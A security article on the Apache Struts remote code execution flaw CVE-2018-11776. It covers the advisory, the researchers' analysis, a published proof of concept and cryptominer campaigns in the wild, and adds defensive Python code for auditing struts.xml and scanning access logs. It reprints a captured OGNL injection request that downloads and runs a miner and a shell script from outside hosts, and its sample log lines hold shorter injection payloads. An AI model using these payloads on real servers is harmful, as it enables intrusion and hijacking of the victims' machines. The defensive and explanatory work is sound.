CVE-2018-11776 RCE in Apache Struts

At the end of August, maintainers of Apache Struts released security updates for the Apache Struts 2 open-source development framework to address a critical remote code execution vulnerability (RCE).

The flaw, tracked as CVE-2018-11776, affects Struts versions from 2.3 through 2.3.34, Struts 2.5 through 2.5.16 and possibly unsupported versions of the framework. Struts versions 2.3.35 and 2.5.17 include the security updates to address this problem.

The Struts development team also published a temporary workaround, but recommends not relying on it and instead installing the updates as soon as possible.

“Possible Remote Code Execution when using results with no namespace and in same time, its upper action(s) have no or wildcard namespace. Same possibility when using url tag which doesn’t have value and action set,” reads the security advisory published by Apache.

The flaw is easy to exploit. According to the security advisory, the RCE can be triggered when no namespace value is set for a result defined in the underlying XML configuration and, at the same time, its upper action configuration has no namespace or a wildcard namespace. It can also be triggered by a url tag that has neither value nor action set while, again, its upper action configuration has no namespace or a wildcard namespace.

The flaw was discovered on April 10 by security researcher Man Yue Mo of the Semmle Security Research team. Security updates were released on June 25, and the new Struts versions followed on 22 August 2018.

“This vulnerability is caused by insufficient validation of untrusted user data in the core of the Struts framework. Due to the fact that this vulnerability affects the core of Struts, there exist multiple separate attack vectors. At the moment, we are aware of two such vectors,” reads the technical analysis published by Semmle.

“For your application to be vulnerable to the attack vectors described below, both of the following conditions should hold:

  1. The alwaysSelectFullNamespace flag is set to true in the Struts configuration. Note that this is automatically the case if your application uses the popular Struts Convention plugin.
  2. Your application’s Struts configuration file contains an <action …> tag that does not specify the optional namespace attribute, or specifies a wildcard namespace (e.g. “/*”)”
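To make the two conditions above concrete, here is an added example (my own code, not Semmle's and not part of the Struts project) that audits a struts.xml for them. It reports whether struts.mapper.alwaysSelectFullNamespace is enabled (or assumed enabled because the Convention plugin is loaded) and lists every redirectAction or chain result that sits in a package with no namespace or a wildcard namespace and does not set a namespace of its own. In struts.xml the namespace lives on the <package> element and is inherited by its actions, which is why the check looks there. The set of result types treated as namespace-sensitive and both sample configurations are assumptions constructed for the example; the "fixed" configuration shows the Apache workaround of setting an explicit namespace everywhere.

```python
import xml.etree.ElementTree as ET

# Constant that makes the action mapper take the namespace from the request URL.
# The Convention plugin sets it to true in its own struts-plugin.xml.
FULL_NAMESPACE_CONSTANT = "struts.mapper.alwaysSelectFullNamespace"

# Result types that build a new action URL and fall back to the request-supplied
# namespace when none is configured. Assumption for this example: redirectAction
# and chain; extend the set if your application uses other redirecting results.
NAMESPACE_SENSITIVE_RESULTS = {"redirectAction", "chain"}


def is_weak_namespace(ns):
    """True for a missing or empty namespace, or a wildcard such as "/*"."""
    return ns is None or ns.strip() == "" or "*" in ns


def audit_struts_xml(xml_text, convention_plugin=False):
    """Report whether a struts.xml document meets both S2-057 preconditions.

    convention_plugin=True models an application that loads the Convention
    plugin, which turns alwaysSelectFullNamespace on without a <constant>.
    """
    root = ET.fromstring(xml_text)
    full_namespace = convention_plugin or any(
        c.get("name") == FULL_NAMESPACE_CONSTANT
        and c.get("value", "").strip().lower() == "true"
        for c in root.iter("constant")
    )

    findings = []
    for pkg in root.iter("package"):
        pkg_ns = pkg.get("namespace")
        if not is_weak_namespace(pkg_ns):
            continue  # an explicit, non-wildcard namespace is inherited by the actions
        for action in pkg.findall("action"):
            for result in action.findall("result"):
                if result.get("type", "dispatcher") not in NAMESPACE_SENSITIVE_RESULTS:
                    continue
                if any(p.get("name") == "namespace" for p in result.findall("param")):
                    continue  # the Apache workaround: namespace set on the result itself
                findings.append({
                    "package": pkg.get("name"),
                    "package_namespace": pkg_ns,
                    "action": action.get("name"),
                    "result": result.get("name", "success"),
                    "type": result.get("type"),
                })

    return {
        "alwaysSelectFullNamespace": full_namespace,
        "findings": findings,
        "vulnerable": full_namespace and bool(findings),  # both conditions must hold
    }


# Constructed sample configuration (DOCTYPE omitted), not from any real application.
VULNERABLE_STRUTS_XML = """<struts>
  <constant name="struts.mapper.alwaysSelectFullNamespace" value="true"/>
  <package name="default" extends="struts-default">
    <action name="login" class="example.LoginAction">
      <result name="success" type="redirectAction">
        <param name="actionName">home</param>
      </result>
      <result name="input">/login.jsp</result>
    </action>
  </package>
  <package name="wild" namespace="/*" extends="struts-default">
    <action name="chainStart" class="example.ChainStart">
      <result name="success" type="chain">chainEnd</result>
    </action>
  </package>
</struts>"""

# The same application after the workaround: explicit namespaces everywhere.
FIXED_STRUTS_XML = """<struts>
  <constant name="struts.mapper.alwaysSelectFullNamespace" value="true"/>
  <package name="default" namespace="/app" extends="struts-default">
    <action name="login" class="example.LoginAction">
      <result name="success" type="redirectAction">
        <param name="actionName">home</param>
        <param name="namespace">/app</param>
      </result>
      <result name="input">/login.jsp</result>
    </action>
  </package>
  <package name="wild" namespace="/wild" extends="struts-default">
    <action name="chainStart" class="example.ChainStart">
      <result name="success" type="chain">
        <param name="actionName">chainEnd</param>
        <param name="namespace">/wild</param>
      </result>
    </action>
  </package>
</struts>"""


if __name__ == "__main__":
    for label, xml in (("vulnerable", VULNERABLE_STRUTS_XML), ("fixed", FIXED_STRUTS_XML)):
        report = audit_struts_xml(xml)
        print(label, "->", "VULNERABLE" if report["vulnerable"] else "ok", report["findings"])
```

Run it against each struts.xml in the deployment (and pass convention_plugin=True where the Convention plugin is on the classpath); a non-empty findings list with the flag enabled is the configuration the advisory describes, and the fix is either the upgrade or the explicit namespaces shown in the second sample.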

The vulnerability affects commonly-used endpoints of Struts, which are likely to be exposed.

“Attackers can attack vulnerable applications by injecting their own namespace as a parameter in an HTTP request. The value of that parameter is insufficiently validated by the Struts framework, and can be any OGNL string. OGNL (Object-Graph Navigation Language) is a powerful domain-specific language that is used to customize Apache Struts’ behavior,” the researcher explained.

CVE-2018-11776 Exploit Code Was Published on GitHub

Experts explained that the flaw is quite easy to exploit, which makes it very dangerous given the number of installs exposed online. An attacker triggers it by injecting a namespace of their own as a parameter in an HTTP request; the lack of proper validation of that parameter is the root of the problem.

Just two days after the Apache Software Foundation released the security advisory about the RCE in Apache Struts 2, a working proof-of-concept (PoC) was published online.

Researchers from the threat intelligence firm Recorded Future observed intense activity related to the Struts vulnerability in several Chinese and Russian underground forums.

“Unfortunately, this makes the vulnerability trivial to exploit — in fact, proof-of-concept code has already been released, including a Python script that allows for easy exploitation. Recorded Future has also detected chatter in a number of Chinese and Russian underground forums around the exploitation of this vulnerability,” reads the analysis published by Recorded Future.

“Unlike last year’s Apache Struts exploit (CVE-2017-5638), which was at the center of the Equifax breach, this vulnerability appears easier to exploit because it does not require the Apache Struts installation to have any additional plugins running in order to successfully exploit it.”

The number of potentially vulnerable applications is very high due to the popularity of the framework.

“Apache Struts is a very popular Java framework and there are potentially hundreds of millions of vulnerable systems that could be exploited by this flaw. The challenge is in identifying how many systems are vulnerable.” continues Recorded Future.

“Because many of the servers running Apache Struts are backend application servers, they are not always easily identified, even by the system owners.”

Another aspect to consider is that many Struts installs cannot be updated immediately, particularly in critical environments, and those systems remain exposed to attack in the meantime.

Experts warn of mass Internet scans for vulnerable systems and fear a spike in hacking activities targeting flawed systems.

Struts Flaw Exploited in Attacks in the Wild

A few hours after the exploit code for the remote code execution vulnerability was made available online, researchers from the threat intelligence firm Volexity revealed that the flaw was already being abused in malicious attacks.

Threat actors are leveraging the flaw in an attempt to install the CNRig cryptocurrency miner.

“Volexity has observed at least one threat actor attempting to exploit CVE-2018-11776 en masse in order to install the CNRig cryptocurrency miner,” states the report published by Volexity.

“The initial observed scanning originated from the Russian and French IP addresses 95.161.225.94 and 167.114.171.27.” 

The exploit code used by the attackers connects to a GitHub repository to fetch a copy of the CNRig miner (saving it as xrig) and to Bitbucket to download a shell script.

Below is an example of an exploit attempt observed by the experts from Volexity in live attacks:

GET /struts3-showcase/$${(#_memberAccess["allowStaticMethodAccess"]=true,#a=@java.lang.Runtime@getRuntime().exec('wget -O xrig hxxps://github.com/cnrig/cnrig/releases/download/v0.1.5-release/cnrig-0.1.5-linux-x86_64;wget hxxps://bitbucket.org/c646/zz/downloads/upcheck.sh || curl -L hxxps://bitbucket.org/c646/zz/downloads/upcheck.sh --output upcheck.sh;chmod +x xrig;chmod +x upcheck.sh;nohup ./upcheck.sh &;nohup ./xrig -a cryptonight -o us-east.cryptonight-hub.miningpoolhub.com:20580 -u c646.miner -p x &;rm xrig').getInputStream(),#b=new java.io.InputStreamReader(#a),#c=new java.io.BufferedReader(#b),#d=new char[51020],#c.read(#d),#sbtest=@org.apache.struts2.ServletActionContext@getResponse().getWriter(),#sbtest.println(#d),#sbtest.close())}/actionChain1.action HTTP/1.1

The analysis continues, explaining how the exploit will proceed:

“If the above exploit attempt is successful, the vulnerable system will perform wget requests to the two URLs listed below in order to download a copy of CNRig Miner from Github (saved as xrig) and a shell script from BitBucket (upcheck.sh).”
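Because the S2-057 payload rides in the namespace portion of the URL path (unlike the 2017 Content-Type bug, which used a header), a web server access log is enough to spot attempts like the one above. The following is an added example of that detection logic, my own code and not part of the Volexity report or any product: it parses combined-format log lines, percent-decodes the request path (twice, to catch double encoding), and flags any path containing an OGNL opener (${ or %{), rating the hit high when known RCE markers such as #_memberAccess or @java.lang.Runtime@ are present. The sample log lines are constructed for the example; the two scanning addresses reported by Volexity are reused as source IPs, and the shortened payloads are illustrative rather than copied from the report. It deliberately ignores the query string, so it is a detector for this path-based vector, not for every Struts OGNL bug.

```python
import re
from urllib.parse import unquote

# Apache/nginx "combined" log format: enough to pull the request line apart.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" (?P<status>\d{3}) \S+'
)
# An OGNL expression opener: ${ ... } or %{ ... }.
OGNL_OPEN = re.compile(r"[$%]\{")
# Substrings seen in RCE payloads that have no business in a URL path.
RCE_MARKERS = (
    "#_memberAccess", "@java.lang.Runtime@", "getRuntime()", ".exec(",
    "ProcessBuilder", "#context", "ServletActionContext",
)


def decode_path(path, rounds=2):
    """Percent-decode repeatedly (attackers double-encode) but stop once stable."""
    for _ in range(rounds):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    return path


def classify_request(request_line):
    """Return a finding dict if the URL path carries an OGNL expression, else None."""
    parts = request_line.split()
    if len(parts) < 2:
        return None
    method, target = parts[0], parts[1]
    path = target.split("?", 1)[0]  # S2-057 is injected into the path, not the query
    decoded = decode_path(path)
    if not OGNL_OPEN.search(decoded):
        return None
    markers = [m for m in RCE_MARKERS if m in decoded]
    return {
        "method": method,
        "path": path,
        "decoded_path": decoded,
        "markers": markers,
        "severity": "high" if markers else "medium",
    }


def scan_access_log(lines):
    """Return one finding per log line whose request path looks like an S2-057 probe."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than guess
        hit = classify_request(m.group("req"))
        if hit:
            hit.update(ip=m.group("ip"), ts=m.group("ts"), status=m.group("status"))
            findings.append(hit)
    return findings


# Constructed sample log lines (not taken from the Volexity report). Quotes inside
# the payload are percent-encoded, as a real client would send them.
SAMPLE_LOG = [
    '10.0.0.5 - - [23/Aug/2018:10:15:21 +0000] "GET /struts3-showcase/actionChain1.action HTTP/1.1" 200 2048',
    '95.161.225.94 - - [23/Aug/2018:10:16:02 +0000] "GET /struts3-showcase/$${(#_memberAccess[%22allowStaticMethodAccess%22]=true,#a=@java.lang.Runtime@getRuntime().exec(%27id%27).getInputStream())}/actionChain1.action HTTP/1.1" 200 512',
    '167.114.171.27 - - [23/Aug/2018:10:16:40 +0000] "GET /struts3-showcase/%24%7B%28%23_memberAccess%5B%27allowStaticMethodAccess%27%5D%3Dtrue%29%7D/actionChain1.action HTTP/1.1" 302 0',
    '10.0.0.9 - - [23/Aug/2018:10:17:05 +0000] "GET /struts3-showcase/showcase.action?q=%24%7Bprice%7D HTTP/1.1" 200 777',
]


if __name__ == "__main__":
    for hit in scan_access_log(SAMPLE_LOG):
        print(f'{hit["ts"]} {hit["ip"]} {hit["severity"]:6} {hit["markers"]} {hit["path"][:60]}')
```

On the sample data the two probing lines are flagged (the first with the full set of RCE markers, the second with #_memberAccess alone), while the normal request and the one that merely has a ${ inside its query string are not. Point scan_access_log at a real log stream and treat any high-severity hit from an external address as an exploitation attempt against the Struts hosts behind that vhost.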

The shell script is used by the attackers to remove previous instances of the miner, kill specific processes and download three ELF cryptomining binaries.

The miners used by the threat actors in this campaign target multiple architectures, including Intel, ARM and MIPS. This circumstance suggests the attackers are targeting the largest audience possible.

“The three ELF binaries downloaded are executables for the Intel, ARM, and MIPS architectures. This is worth noting, as it shows the miner is capable of running across a wide range of hardware, such as servers, desktops, laptops, IoT devices, wireless routers, and more — nearly any internet connected device running a vulnerable instance of Apache Struts,” states the report from Volexity.

The BitBucket folder involved in the attack contains both the shell script and the ELF binaries. Researchers observed that the mining account name is the same as the BitBucket account name.

Conclusion

Apache Struts vulnerabilities are very dangerous for organizations. One of them was the root cause of the massive Equifax breach that impacted over 140 million people. As pointed out by the experts, this flaw is easier to exploit than the Equifax one.

There are two ways to protect against exploitation of this flaw. The first is to upgrade to the fixed releases of Apache Struts, 2.3.35 or 2.5.17. The second is Apache's interim workaround: make sure a namespace is explicitly set for every result defined in the Struts configuration, and that every url tag sets both value and action, so the framework never has to fall back to the namespace supplied in the request.

Volexity concluded that “… the Apache Struts framework continues to be targeted by attackers due to a steady stream of critical vulnerabilities. It is critical that organizations remain diligent, ensuring this software is updated quickly when new patches are released or otherwise limiting external access to websites leveraging it. Although the main payload for Apache Struts exploits appears to be cryptocurrency miners, failure to patch also leaves an organization open to significant risk that goes beyond cryptomining.”

I personally believe the number of campaigns targeting the CVE-2018-11776 vulnerability will increase, due to the large number of Apache Struts 2 installs still unpatched that are exposed online.

Sources

Experts discovered a Critical Remote Code Execution flaw in Apache Struts (CVE-2018-11776), Security Affairs

Experts warn of possible attacks after PoC code for CVE-2018-11776 Struts flaw was published, Security Affairs

Critical Apache Struts flaw CVE-2018-11776 exploited in attacks in the wild, Security Affairs

S2-057, Apache Struts 2 Documentation

Semmle Discovers Critical Remote Code Execution Vulnerability in Apache Struts (CVE-2018-11776), Semmle

Apache Struts Vulnerability POC Code Found on GitHub, Recorded Future

pr4jwal/quick-scripts, GitHub

Active Exploitation of New Apache Struts Vulnerability CVE-2018-11776 Deploys Cryptocurrency Miner, Volexity